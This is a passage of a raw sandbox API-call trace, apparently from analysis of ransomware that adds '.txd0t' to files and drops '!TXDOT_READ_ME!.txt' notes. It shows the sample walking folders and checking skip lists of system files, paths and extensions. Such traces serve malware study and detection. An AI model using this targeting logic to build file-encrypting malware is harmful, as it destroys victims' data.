nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.838] StrCmpW (psz1="..", psz2=".") returned 1 [0128.838] StrCmpW (psz1="..", psz2="..") returned 0 [0128.838] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58d06c80, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58d06c80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d530db, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.839] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.839] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.839] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0128.839] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0128.839] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\3082\\!TXDOT_READ_ME!.txt" [0128.839] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.839] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.839] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.839] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58d06c80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xdfd, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.839] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.839] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.839] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0128.839] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0128.839] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t" [0128.839] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.839] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.839] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13a7c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.839] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.839] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.839] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0128.839] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0128.839] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.txd0t" [0128.840] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.840] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.840] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.840] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.840] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.840] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0128.840] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0128.840] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" [0128.840] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.840] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.840] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.840] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.840] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.840] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.840] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.840] GetProcessHeap () returned 0xe30000 [0128.840] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.840] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58eaa853, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58eaa853, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0128.840] StrCmpW (psz1="Client", psz2=".") returned 1 [0128.840] StrCmpW (psz1="Client", psz2="..") returned 1 [0128.840] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.840] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.841] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Client", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\system32\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\system\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\local\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\boot\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\perflogs\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\programdata\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\drivers\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\wsus\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="crypt_detect") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="cryptolocker") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="ransomware") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\WINDOWS") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.841] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\Program Files") returned 0x0 [0128.841] GetProcessHeap () returned 0xe30000 [0128.841] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ba) returned 0x6874278 [0128.841] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0128.841] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\*", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\*") returned="C:\\588bce7c90097ed212\\Client\\*" [0128.841] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58eaa853, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58eaa853, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.841] StrCmpW (psz1=".", psz2=".") returned 0 [0128.841] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58eaa853, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58eaa853, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.842] StrCmpW (psz1="..", psz2=".") returned 1 [0128.842] StrCmpW (psz1="..", psz2="..") returned 0 [0128.842] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58e37f09, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58e37f09, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58e5e194, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.842] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.842] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.842] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0128.842] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0128.842] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\Client\\!TXDOT_READ_ME!.txt" [0128.842] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.842] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.842] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.842] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x31644, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="Parameterinfo.xml.txd0t", cAlternateFileName="PARAME~1.TXD")) returned 1 [0128.842] StrCmpW (psz1="Parameterinfo.xml.txd0t", psz2=".") returned 1 [0128.842] StrCmpW (psz1="Parameterinfo.xml.txd0t", psz2="..") returned 1 [0128.842] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0128.842] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0128.842] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="Parameterinfo.xml.txd0t", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.txd0t" [0128.842] PathFindExtensionW (pszPath="Parameterinfo.xml.txd0t") returned=".txd0t" [0128.842] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.842] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a82, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 1 [0128.842] StrCmpW (psz1="UiInfo.xml.txd0t", psz2=".") returned 1 [0128.842] StrCmpW (psz1="UiInfo.xml.txd0t", psz2="..") returned 1 [0128.843] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0128.843] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0128.843] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="UiInfo.xml.txd0t", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.txd0t" [0128.843] PathFindExtensionW (pszPath="UiInfo.xml.txd0t") returned=".txd0t" [0128.843] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.843] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a82, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 0 [0128.843] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.843] GetProcessHeap () returned 0xe30000 [0128.843] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.843] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x58ed08e4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x40f6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="DHtmlHeader.html.txd0t", cAlternateFileName="DHTMLH~1.TXD")) returned 1 [0128.843] StrCmpW (psz1="DHtmlHeader.html.txd0t", psz2=".") returned 1 [0128.843] StrCmpW (psz1="DHtmlHeader.html.txd0t", psz2="..") returned 1 [0128.843] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.843] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.843] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="DHtmlHeader.html.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\DHtmlHeader.html.txd0t") returned="C:\\588bce7c90097ed212\\DHtmlHeader.html.txd0t" [0128.843] PathFindExtensionW (pszPath="DHtmlHeader.html.txd0t") returned=".txd0t" [0128.843] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.843] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0128.843] StrCmpW (psz1="DisplayIcon.ico", psz2=".") returned 1 [0128.843] StrCmpW (psz1="DisplayIcon.ico", psz2="..") returned 1 [0128.843] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.843] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.843] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="DisplayIcon.ico", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned="C:\\588bce7c90097ed212\\DisplayIcon.ico" [0128.843] PathFindExtensionW (pszPath="DisplayIcon.ico") returned=".ico" [0128.843] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="bootsect.bak") returned 1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="iconcache.db") returned -1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="thumbs.db") returned -1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2=" ransomware ") returned 1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2=" ransom ") returned 1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="debug.txt") returned 1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="boot.ini") returned 1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="desktop.ini") returned 1 [0128.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="autorun.inf") returned 1 [0128.844] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntuser.dat") returned -1 [0128.844] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntldr") returned -1 [0128.844] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntdetect.com") returned -1 [0128.844] StrCmpIW (psz1="DisplayIcon.ico", psz2="bootfont.bin") returned 1 [0128.844] StrCmpIW (psz1="DisplayIcon.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.844] PathFindExtensionW (pszPath="DisplayIcon.ico") returned=".ico" [0128.844] StrStrIW 